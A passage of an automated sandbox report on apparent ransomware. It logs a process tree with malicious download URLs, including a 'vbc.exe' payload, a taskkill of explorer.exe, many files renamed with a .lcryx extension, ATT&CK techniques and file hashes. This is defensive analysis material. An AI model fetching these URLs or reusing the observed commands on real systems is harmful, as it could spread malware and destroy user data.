  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:2372
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3692
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:5387267 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4408
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:50344961 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7564
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:50279426 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:7692
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:50803714 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7740
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:51000321 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:8104
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2088
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2088 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3684
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2904
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:4888
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4888 -s 492
        5⤵
        
        PID:4244
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:4776
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:5572
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5572 -s 496
        5⤵
        
        PID:2004
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:6080
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:5812
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5812 -s 496
        5⤵
        
        PID:5032
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2152
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6012
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6012 -s 504
        5⤵
        
        PID:10476
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5444
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6844
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6844 -s 500
        5⤵
        
        PID:11432
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:6784
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:6876
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6876 -s 500
        5⤵
        
        PID:4020
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5168
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:4732
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4732 -s 492
        5⤵
        
        PID:1656
      - C:\Windows\system32\mspaint.exe
        
        "C:\Windows\system32\mspaint.exe" /restart 5c2e486b-7017-408f-bb13-f0eb053cae06
        6⤵
        Drops file in Windows directory
        
        PID:8960
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:6160
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:7164
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7164 -s 496
        5⤵
        
        PID:2416
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:7336
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:7744
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7744 -s 496
        5⤵
        
        PID:12960
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8000
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:7432
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:7736
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6700
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:7680
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8056
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8056 -s 500
        5⤵
        
        PID:580
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:7516
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:7472
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7472 -s 496
        5⤵
        
        PID:13072
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:7792
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6828
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6828 -s 496
        5⤵
        
        PID:4788
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8100
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:7452
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7452 -s 496
        5⤵
        
        PID:5204
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:7936
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:7468
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7468 -s 504
        5⤵
        
        PID:12492
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8392
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8732
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8732 -s 496
        5⤵
        
        PID:12188
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8944
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8316
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8316 -s 496
        5⤵
        
        PID:13308
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8656
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:9016
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 9016 -s 500
        5⤵
        
        PID:12316
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8292
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8884
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8884 -s 496
        5⤵
        
        PID:12652
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9120
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8704
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8704 -s 496
        5⤵
        
        PID:12704
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9084
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8832
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8832 -s 500
        5⤵
        
        PID:12224
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8376
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8412
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8412 -s 484
        5⤵
        
        PID:2772
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:8716
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:9460
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 9460 -s 484
        5⤵
        
        PID:12988
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9708
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:10048
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 10048 -s 492
        5⤵
        
        PID:1588
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9336
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:9968
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9504
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:10060
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 10060 -s 492
        5⤵
        
        PID:9552
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9888
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8640
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8640 -s 480
        5⤵
        
        PID:5696
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9780
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:9736
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 9736 -s 484
        5⤵
        
        PID:6272
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:10736
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:11192
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 11192 -s 484
        5⤵
        
        PID:13248
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:10384
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:10880
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 10880 -s 508
        5⤵
        
        PID:6840
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11184
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:10464
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 10464 -s 496
        5⤵
        
        PID:6480
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2968
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:2120
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2120 -s 496
        5⤵
        
        PID:2084
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2724
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:10456
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 10456 -s 492
        5⤵
        
        PID:3808
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5104
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:11104
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 11104 -s 480
        5⤵
        
        PID:13276
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:932
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:5080
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5080 -s 500
        5⤵
        
        PID:9492
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2112
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:11392
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 11392 -s 492
        5⤵
        
        PID:4380
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11740
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:11452
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 11452 -s 500
        5⤵
        
        PID:7152
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11436
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12236
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12236 -s 496
        5⤵
        
        PID:12956
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:10404
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12040
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12040 -s 504
        5⤵
        
        PID:3908
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11276
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:4952
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4952 -s 480
        5⤵
        
        PID:6992
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12160
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:11428
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 11428 -s 480
        5⤵
        
        PID:5024
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11812
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12240
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12240 -s 480
        5⤵
        
        PID:13184
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11656
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:10468
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2336
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12084
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12084 -s 496
        5⤵
        
        PID:5468
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:11864
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6024
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6024 -s 496
        5⤵
        
        PID:5884
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12624
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6856
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6856 -s 500
        5⤵
        
        PID:8616
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12512
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12900
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12900 -s 492
        5⤵
        
        PID:1200
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:13108
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12252
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12252 -s 492
        5⤵
        
        PID:8848
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5220
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6108
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6108 -s 496
        5⤵
        
        PID:9384
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12632
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:5480
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5480 -s 492
        5⤵
        
        PID:12328
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:13160
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12684
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12684 -s 492
        5⤵
        
        PID:856
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12412
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12944
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12944 -s 496
        5⤵
        
        PID:3032
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12992
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12724
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12724 -s 496
        5⤵
        
        PID:9488
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:13076
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12676
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12676 -s 492
        5⤵
        
        PID:12648
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:6088
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12360
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12812
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:6124
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5840
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12488
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 12488 -s 500
        5⤵
        
        PID:12856
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:13012
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12604
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:6508
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:12640
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5024
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      PID:13268
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:13048
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:12600
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:5228
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:4728
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      PID:8796
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:1588
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      PID:9940
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:9812
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\BlockEnable.ps1.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:5612
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\BlockUnpublish.dotm.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:6300
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\ConvertToEnter.M2V.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:7480
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\desktop.ini.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:7596
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\DisableRemove.svgz.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:2976
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\EditSync.docx.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:10076
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\ExportBlock.xls.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:12068
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\GetConnect.TTS.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:12616
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\InvokeReset.vstx.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:8588
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\JoinRedo.docx.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:13184

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1EE2A8B033EB8C8D30746A1B3BD4E662

Filesize
504B

MD5
9351cc0c01783065e0e50b852c732dc4

SHA1
b4768c3bb4e1fe2e96bbb346deafab6760497168

SHA256
479c53c5e913131dc092554f42cb40877fc1899e50c816f1ad5f096737b7970b

SHA512
d31739b56758c6af7eb9c1fdee13bb0d4b5632ec05512cdb5bf8619af9f57bc2e70db7eedf628b9fb20a461ca5c2f7751e19d7543ddd9f4ef8e4d60c737e1d16

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
e4371e4f58e222275d1ebc0c14876593

SHA1
5582883d674c9b1bf3eef72eb08edc8806afbcc8

SHA256
a0d1a6695cc8fcc5e3d823f7794f64c6bdbb58217e514e14e8b608b8827b7920

SHA512
04cb6a75a0f1d8aa1d152e134237b6c5873a71a3dad2307036d4050c00cf687ba1d1a6755f2907501de6e76b84b210e0b237e6c6dbad1d655e53c5d14ebb11d0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35DDEDF268117918D1D277A171D8DF7B_35F8500DD4A291FDDC2DA5DB7F867071

Filesize
471B

MD5
c210680c65d69f08c5728d7dee27bfa3

SHA1
cdf5c41b481ef4a34243d1ccf6cad8a4f411f30f

SHA256
1d2cfad521c926543841ae896e098d3c402b0ad749e02a1d263b56d14f118652

SHA512
2ed839784b1b5ab34609c888a1d9fb82c361da88571eafea0ab7795c98fe581e7f97aacbc396c145a664af8314d46b5b22fac9fad5edb109d2609b128601b244

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD

Filesize
471B

MD5
6c52aa2bc66cc6e979cf61111a766be9

SHA1
9ac989af66cf25b7ac5a2edd9207046f48ba9ce9

SHA256
2a1c5ecd47ba7faaf614859d6206d0e0307bd6d85a28f0d08800b8a8c4961f4d

SHA512
4c03a340d56df97b06cd8d5fa08de6e284234d675c800eced01f3d32455209ce9da5e5f09352f9e8f8a6754062bfae6a429bc73c490597264eae0537c24bd022

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_3247EAD763AFDAC8D547ACA55BB3C63C

Filesize
471B

MD5
8332a4a4f28c0d070a112ed90354eeba

SHA1
e8c1ff9d792dcd095d9df79d2487805e685f9d2f

SHA256
563c1aef5df07cb34294907e0ccf22df08207e3fc493ed023fc9a1134408dbeb

SHA512
9e3ab520f1757158f87ebaaecba5b1b5699416f74710031e5a34389bf999a767620168db7cb6838503a19d42402abd19e8e55491adf4f8365d5d97fa828f31fb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_56F1C8A5D236355FC34CFBE3B2731F85

Filesize
472B

MD5
a4eabe344442b9d3fa160777b42f4ed8

SHA1
67688b8065f902446727791d4f08ccfc625e5087

SHA256
621dc6fc1e00616fcf8ca0bea45c894d6351eb5cdc164cdf7b7a0432127c8686

SHA512
976134568c59574d20eff7ffef60530895e810c6bfe085e58c45242f5451dc61127a4d5c764e8103fbe7f0b1c7d5d879db27c9ace641a90b8702f025e29eca87

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Filesize
471B

MD5
2a9c981d8b404779f6c0e3c68cbb6930

SHA1
66665bc144f4238e5d4e744ce2e0c7b08f75d3c9

SHA256
7d0d5385d17718abf56eb2e4d945459683a2f32d4b8b941758fdf6b425404992

SHA512
a63d2ba2cc20ad9df7a953bc8ee32d72192f2fd565f7ebccaf1d6c6feb305cd275d5fc160034dd947704c755f4755321a414d56122a710ff51867229b9221cfd

Download Submit
